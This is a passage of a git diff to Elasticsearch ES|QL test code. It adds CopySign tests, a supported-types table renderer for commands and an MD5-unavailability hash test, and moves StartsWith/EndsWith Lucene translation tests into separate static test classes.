assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after FORK")); + } + private void checkFullTextFunctionsInStats(String functionInvocation) { query("from test | stats c = max(id) where " + functionInvocation, fullTextAnalyzer); query("from test | stats c = max(id) where " + functionInvocation + " or length(title) > 10", fullTextAnalyzer); @@ -2239,7 +2387,7 @@ private void query(String query) { } private void query(String query, Analyzer analyzer) { - analyzer.analyze(parser.createStatement(query)); + analyzer.analyze(parser.createStatement(query, TEST_CFG)); } private String error(String query) { @@ -2270,7 +2418,7 @@ private String error(String query, Analyzer analyzer, Class Throwable e = expectThrows( exception, "Expected error for query [" + query + "] but no error was raised", - () -> analyzer.analyze(parser.createStatement(query, new QueryParams(parameters))) + () -> analyzer.analyze(parser.createStatement(query, new QueryParams(parameters), TEST_CFG)) ); assertThat(e, instanceOf(exception)); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java index 68a6f38cdd69a..039b34252c12e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java @@ -79,7 +79,7 @@ public EsqlFunctionRegistry snapshotRegistry() { } }; - var plan = parser.createStatement(esql); + var plan = parser.createStatement(esql, EsqlTestUtils.TEST_CFG); plan = plan.transformDown( Limit.class, l -> Objects.equals(l.limit().fold(FoldContext.small()), 10) diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java index 593a444eceec2..d1d5361880218 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java @@ -52,6 +52,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { Releasables.closeExpectNoException(child); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java index 7bcb194c62a75..e60eeb63785d5 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java @@ -60,7 +60,9 @@ import java.util.List; import java.util.Locale; import java.util.Map; +import java.util.Objects; import java.util.Optional; +import java.util.TreeMap; import java.util.function.Function; import java.util.function.Supplier; import java.util.regex.Matcher; @@ -308,7 +310,7 @@ public License.OperationMode invoke(List fieldTypes) throws Exception protected final String name; protected final FunctionDefinition definition; protected final Logger logger; - private final Supplier, DataType>> signatures; + protected final Supplier, DataType>> signatures; private TempFileWriter tempFileWriter; private final LicenseRequirementChecker licenseChecker; @@ -836,14 +838,30 @@ void renderDetailedDescription(String detailedDescription, String note) throws I /** Command specific docs generating, currently very empty since we only render kibana definition files */ public static class CommandsDocsSupport extends DocsV3Support { private final LogicalPlan command; + private List args; private final XPackLicenseState licenseState; + /** Used in CommandLicenseTests to generate Kibana docs with licensing information for commands */ public CommandsDocsSupport(String name, Class testClass, LogicalPlan command, XPackLicenseState licenseState) { super("commands", name, testClass, Map::of); this.command = command; this.licenseState = licenseState; } + /** Used in LookupJoinTypesIT to generate table of supported types for join field */ + public CommandsDocsSupport( + String name, + Class testClass, + LogicalPlan command, + List args, + Supplier, DataType>> signatures + ) { + super("commands", name, testClass, signatures); + this.command = command; + this.args = args; + this.licenseState = null; + } + @Override public void renderSignature() throws IOException { // Unimplemented until we make command docs dynamically generated @@ -851,8 +869,14 @@ public void renderSignature() throws IOException { @Override public void renderDocs() throws Exception { - // Currently we only render kibana definition files, but we could expand to rendering much more if we decide to - renderKibanaCommandDefinition(); + // Currently we only render either signatures or kibana definition files, + // but we could expand to rendering much more if we decide to + if (args != null) { + renderTypes(name, args); + } + if (licenseState != null) { + renderKibanaCommandDefinition(); + } } void renderKibanaCommandDefinition() throws Exception { @@ -872,6 +896,47 @@ void renderKibanaCommandDefinition() throws Exception { writeToTempKibanaDir("definition", "json", rendered); } } + + @Override + void renderTypes(String name, List args) throws IOException { + assert args.size() == 2; + StringBuilder header = new StringBuilder("| "); + StringBuilder separator = new StringBuilder("| "); + List argNames = args.stream().map(EsqlFunctionRegistry.ArgSignature::name).toList(); + for (String arg : argNames) { + header.append(arg).append(" | "); + separator.append("---").append(" | "); + } + + Map> compactedTable = new TreeMap<>(); + for (Map.Entry, DataType> sig : this.signatures.get().entrySet()) { + if (shouldHideSignature(sig.getKey(), sig.getValue())) { + continue; + } + String mainType = sig.getKey().getFirst().esNameIfPossible(); + String secondaryType = sig.getKey().get(1).esNameIfPossible(); + List secondaryTypes = compactedTable.computeIfAbsent(mainType, (k) -> new ArrayList<>()); + secondaryTypes.add(secondaryType); + } + + List table = new ArrayList<>(); + for (Map.Entry> sig : compactedTable.entrySet()) { + String row = "| " + sig.getKey() + " | " + String.join(", ", sig.getValue()) + " |"; + table.add(row); + } + Collections.sort(table); + if (table.isEmpty()) { + logger.info("Warning: No table of types generated for [{}]", name); + return; + } + + String rendered = DOCS_WARNING + """ + **Supported types** + + """ + header + "\n" + separator + "\n" + String.join("\n", table) + "\n\n"; + logger.info("Writing function types for [{}]:\n{}", name, rendered); + writeToTempSnippetsDir("types", rendered); + } } protected String buildFunctionSignatureSvg() throws IOException { @@ -893,6 +958,7 @@ void renderParametersList(List argNames, List argDescriptions) t } void renderTypes(String name, List args) throws IOException { + boolean showResultColumn = signatures.get().values().stream().anyMatch(Objects::nonNull); StringBuilder header = new StringBuilder("| "); StringBuilder separator = new StringBuilder("| "); List argNames = args.stream().map(EsqlFunctionRegistry.ArgSignature::name).toList(); @@ -900,8 +966,10 @@ void renderTypes(String name, List args) thro header.append(arg).append(" | "); separator.append("---").append(" | "); } - header.append("result |"); - separator.append("--- |"); + if (showResultColumn) { + header.append("result |"); + separator.append("--- |"); + } List table = new ArrayList<>(); for (Map.Entry, DataType> sig : this.signatures.get().entrySet()) { // TODO flip to using sortedSignatures @@ -911,7 +979,7 @@ void renderTypes(String name, List args) thro if (sig.getKey().size() > argNames.size()) { // skip variadic [test] cases (but not those with optional parameters) continue; } - table.add(getTypeRow(args, sig, argNames)); + table.add(getTypeRow(args, sig, argNames, showResultColumn)); } Collections.sort(table); if (table.isEmpty()) { @@ -930,7 +998,8 @@ void renderTypes(String name, List args) thro private static String getTypeRow( List args, Map.Entry, DataType> sig, - List argNames + List argNames, + boolean showResultColumn ) { StringBuilder b = new StringBuilder("| "); for (int i = 0; i < sig.getKey().size(); i++) { @@ -944,8 +1013,10 @@ private static String getTypeRow( b.append(" | "); } b.append("| ".repeat(argNames.size() - sig.getKey().size())); - b.append(sig.getValue().esNameIfPossible()); - b.append(" |"); + if (showResultColumn) { + b.append(sig.getValue().esNameIfPossible()); + b.append(" |"); + } return b.toString(); } @@ -1021,19 +1092,21 @@ void renderKibanaInlineDocs(String name, String titleName, FunctionInfo info) th builder.append("### ").append(titleName.toUpperCase(Locale.ROOT)).append("\n"); String cleanedDesc = replaceLinks(info.description()); cleanedDesc = removeAppliesToBlocks(cleanedDesc); - builder.append(cleanedDesc).append("\n\n"); + builder.append(cleanedDesc).append("\n"); + + if (Strings.isNullOrEmpty(info.note()) == false) { + String cleanedNote = replaceLinks(info.note()); + cleanedNote = removeAppliesToBlocks(cleanedNote); + builder.append("\nNote: ").append(cleanedNote).append("\n"); + } if (info.examples().length > 0) { Example example = info.examples()[0]; - builder.append("```esql\n"); + builder.append("\n```esql\n"); builder.append(loadExample(example.file(), example.tag())); builder.append("\n```\n"); } - if (Strings.isNullOrEmpty(info.note()) == false) { - String cleanedNote = replaceLinks(info.note()); - cleanedNote = removeAppliesToBlocks(cleanedNote); - builder.append("Note: ").append(cleanedNote).append("\n"); - } + String rendered = builder.toString(); logger.info("Writing kibana inline docs for [{}]:\n{}", name, rendered); writeToTempKibanaDir("docs", "md", rendered); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java index d8c1b40e78c48..2082db4592efb 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java @@ -159,6 +159,9 @@ public void testConfigurationOptionalFunction() { ); def = r.resolveFunction(r.resolveAlias("DUMMY")); assertEquals(ur.source(), ur.buildResolved(randomConfiguration(), def).source()); + + ParsingException e = expectThrows(ParsingException.class, () -> uf(DEFAULT).buildResolved(randomConfiguration(), def)); + assertThat(e.getMessage(), containsString("expects exactly one argument")); } private static UnresolvedFunction uf(FunctionResolutionStrategy resolutionStrategy, Expression... children) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java index 584f5f013563e..b2311044967bf 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java @@ -47,6 +47,7 @@ import java.util.function.UnaryOperator; import java.util.stream.Collectors; +import static org.elasticsearch.xpack.esql.core.util.NumericUtils.UNSIGNED_LONG_MAX; import static org.elasticsearch.xpack.esql.core.util.SpatialCoordinateTypes.CARTESIAN; import static org.elasticsearch.xpack.esql.core.util.SpatialCoordinateTypes.GEO; import static org.hamcrest.Matchers.equalTo; @@ -357,6 +358,26 @@ public static List getSuppliersForNumericType(DataType type, throw new IllegalArgumentException("bogus numeric type [" + type + "]"); } + /** + * A {@link List} of the cases for the specified type without any limits. + * See {@link #getSuppliersForNumericType} for cases with limits on numbers. + */ + public static List unlimitedSuppliers(DataType type) { + if (type == DataType.INTEGER) { + return intCases(Integer.MIN_VALUE, Integer.MAX_VALUE, true); + } + if (type == DataType.LONG) { + return longCases(Long.MIN_VALUE, Long.MAX_VALUE, true); + } + if (type == DataType.UNSIGNED_LONG) { + return ulongCases(BigInteger.ZERO, UNSIGNED_LONG_MAX, true); + } + if (type == DataType.DOUBLE) { + return doubleCases(-Double.MAX_VALUE, Double.MAX_VALUE, true); + } + throw new IllegalArgumentException("bogus numeric type [" + type + "]"); + } + public static List forBinaryComparisonWithWidening( NumericTypeTestConfigs typeStuff, String lhsName, diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java index 16f80e4564cff..69c14f815a236 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java @@ -32,6 +32,13 @@ protected Expression build(Source source, List args) { @Override protected Matcher expectedTypeErrorMatcher(List> validPerPosition, List signature) { - return equalTo(typeErrorMessage(false, validPerPosition, signature, (v, p) -> "numeric except unsigned_long or counter types")); + return equalTo( + typeErrorMessage( + false, + validPerPosition, + signature, + (v, p) -> "aggregate_metric_double or numeric except unsigned_long or counter types" + ) + ); } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java index 409bb5bcba6fb..a429abf721739 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java @@ -61,7 +61,7 @@ private static TestCaseSupplier makeSupplier(TestCaseSupplier.TypedDataSupplier welfordAlgorithm.add(value); } var result = welfordAlgorithm.evaluate(); - var expected = Double.isInfinite(result) ? null : result; + var expected = Double.isFinite(result) ? result : null; return new TestCaseSupplier.TestCase( List.of(fieldTypedData), "StdDev[field=Attribute[channel=0]]", diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java index fd54408e0e2b8..a7ca2a7a37e19 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java @@ -280,6 +280,11 @@ public Block eval(Page page) { return null; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java new file mode 100644 index 0000000000000..d0792951f98e2 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java @@ -0,0 +1,37 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.expression.function.ErrorsForCasesWithoutExamplesTestCase; +import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; +import org.hamcrest.Matcher; + +import java.util.List; +import java.util.Set; + +import static org.hamcrest.Matchers.equalTo; + +public class CopySignErrorTests extends ErrorsForCasesWithoutExamplesTestCase { + @Override + protected List cases() { + return paramsToSuppliers(CopySignTests.parameters()); + } + + @Override + protected Expression build(Source source, List args) { + return new CopySign(source, args.get(0), args.get(1)); + } + + @Override + protected Matcher expectedTypeErrorMatcher(List> validPerPosition, List signature) { + return equalTo(typeErrorMessage(true, validPerPosition, signature, (v, i) -> "numeric")); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java new file mode 100644 index 0000000000000..5a7dd395eca99 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java @@ -0,0 +1,106 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import com.carrotsearch.randomizedtesting.annotations.Name; +import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; + +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; +import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; +import org.hamcrest.Matcher; +import org.hamcrest.Matchers; + +import java.util.ArrayList; +import java.util.List; +import java.util.function.BiFunction; +import java.util.function.BinaryOperator; +import java.util.function.Supplier; + +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.casesCrossProduct; +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.getCastEvaluator; +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.unlimitedSuppliers; +import static org.hamcrest.Matchers.equalTo; + +public class CopySignTests extends AbstractScalarFunctionTestCase { + public CopySignTests(@Name("TestCase") Supplier testCaseSupplier) { + this.testCase = testCaseSupplier.get(); + } + + @ParametersFactory + public static Iterable parameters() { + List suppliers = new ArrayList<>(); + List numericTypes = List.of(DataType.INTEGER, DataType.LONG, DataType.DOUBLE); + + for (DataType lhsType : numericTypes) { + for (DataType rhsType : numericTypes) { + BinaryOperator expected = (lhs, rhs) -> { + double sign = ((Number) rhs).doubleValue(); + return switch (lhs) { + case Integer v -> { + if (sign < 0) { + yield v > 0 ? -v : v; + } + yield v > 0 ? v : -v; + } + case Long v -> { + if (sign < 0) { + yield v > 0 ? -v : v; + } + yield v > 0 ? v : -v; + } + case Double v -> Math.copySign(v, sign); + case Float v -> Math.copySign(v, sign); + default -> throw new IllegalArgumentException("unsupported [" + lhs.getClass() + "]"); + }; + }; + BiFunction> evaluatorToString = (lhs, rhs) -> { + String name = "CopySign" + switch (lhs) { + case INTEGER -> "Integer"; + case LONG -> "Long"; + case DOUBLE -> "Double"; + case FLOAT -> "Float"; + default -> throw new IllegalStateException("unsupported [" + lhs + "]"); + } + "Evaluator"; + return equalTo( + name + + "[magnitude=Attribute[channel=0], sign=" + + getCastEvaluator("Attribute[channel=1]", rhs, DataType.DOUBLE) + + "]" + ); + }; + casesCrossProduct( + expected, + unlimitedSuppliers(lhsType), + unlimitedSuppliers(rhsType), + evaluatorToString, + (l, r) -> List.of(), + suppliers, + lhsType, + false + ); + } + } + + return parameterSuppliersFromTypedData( + anyNullIsNull(randomizeBytesRefsOffset(suppliers), (nullPosition, nullValueDataType, original) -> { + if (nullPosition == 0 && nullValueDataType == DataType.NULL) { + return DataType.NULL; + } + return original.expectedType(); + }, (nullPosition, nullData, original) -> nullData.isForceLiteral() ? Matchers.equalTo("LiteralsEvaluator[lit=null]") : original) + ); + } + + @Override + protected Expression build(Source source, List args) { + return new CopySign(source, args.get(0), args.get(1)); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java index 1235a175294af..0e2d752433c71 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java @@ -221,6 +221,11 @@ public Block eval(Page page) { throw new AssertionError("shouldn't be called"); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java new file mode 100644 index 0000000000000..ddde306deed7a --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.string; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; +import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Map; + +import static org.hamcrest.Matchers.equalTo; + +public class EndsWithStaticTests extends ESTestCase { + public void testLuceneQuery_AllLiterals_NonTranslatable() { + EndsWith function = new EndsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); + + ESTestCase.assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldableSuffix_NonTranslatable() { + EndsWith function = new EndsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)) + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldableSuffix_Translatable() { + EndsWith function = new EndsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), + Literal.keyword(Source.EMPTY, "a*b?c\\") + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); + + Query query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + + assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "*a\\*b\\?c\\\\", false, false))); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java index d6a6106f9372e..c41b1e14257ee 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java @@ -11,23 +11,15 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.hamcrest.Matcher; import java.util.LinkedList; import java.util.List; -import java.util.Map; import java.util.function.Supplier; import static org.hamcrest.Matchers.equalTo; @@ -106,34 +98,4 @@ private static TestCaseSupplier.TestCase testCase( protected Expression build(Source source, List args) { return new EndsWith(source, args.get(0), args.get(1)); } - - public void testLuceneQuery_AllLiterals_NonTranslatable() { - var function = new EndsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldableSuffix_NonTranslatable() { - var function = new EndsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)) - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldableSuffix_Translatable() { - var function = new EndsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), - Literal.keyword(Source.EMPTY, "a*b?c\\") - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); - - var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - - assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "*a\\*b\\?c\\\\"))); - } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java index 871bec7c06804..61577ee56777e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java @@ -13,22 +13,30 @@ import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.MockBigArrays; import org.elasticsearch.common.util.PageCacheRecycler; +import org.elasticsearch.common.util.Result; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.hamcrest.OptionalMatchers; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Literal; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.junit.After; +import java.security.NoSuchAlgorithmException; +import java.security.Provider; +import java.security.Security; import java.util.ArrayList; import java.util.Collections; import java.util.List; +import static org.elasticsearch.test.TestMatchers.throwableWithMessage; import static org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase.evaluator; import static org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase.field; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.startsWith; public class HashStaticTests extends ESTestCase { @@ -45,6 +53,27 @@ public void testInvalidAlgorithmLiteral() { assertThat(e.getMessage(), startsWith("invalid algorithm for [hast(\"invalid\", input)]: invalid MessageDigest not available")); } + public void testTryCreateUnavailableMd5() throws NoSuchAlgorithmException { + assumeFalse("We run with different security providers in FIPS, and changing them at runtime is more complicated", inFipsJvm()); + final Provider sunProvider = Security.getProvider("SUN"); + try { + Security.removeProvider("SUN"); + final Result result = Hash.HashFunction.tryCreate("MD5"); + assertThat(result.isSuccessful(), is(false)); + assertThat(result.failure(), OptionalMatchers.isPresentWith(throwableWithMessage(containsString("MD5")))); + expectThrows(NoSuchAlgorithmException.class, result::get); + } finally { + Security.addProvider(sunProvider); + } + + { + final Result result = Hash.HashFunction.tryCreate("MD5"); + assertThat(result.isSuccessful(), is(true)); + assertThat(result.failure(), OptionalMatchers.isEmpty()); + assertThat(result.get().algorithm(), is("MD5")); + } + } + /** * The following fields and methods were borrowed from AbstractScalarFunctionTestCase */ diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java new file mode 100644 index 0000000000000..105ce6a9e4142 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.string; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Map; + +import static org.hamcrest.Matchers.equalTo; + +public class StartsWithStaticTests extends ESTestCase { + + public void testLuceneQuery_AllLiterals_NonTranslatable() { + var function = new StartsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldablePrefix_NonTranslatable() { + var function = new StartsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), + new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)) + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void 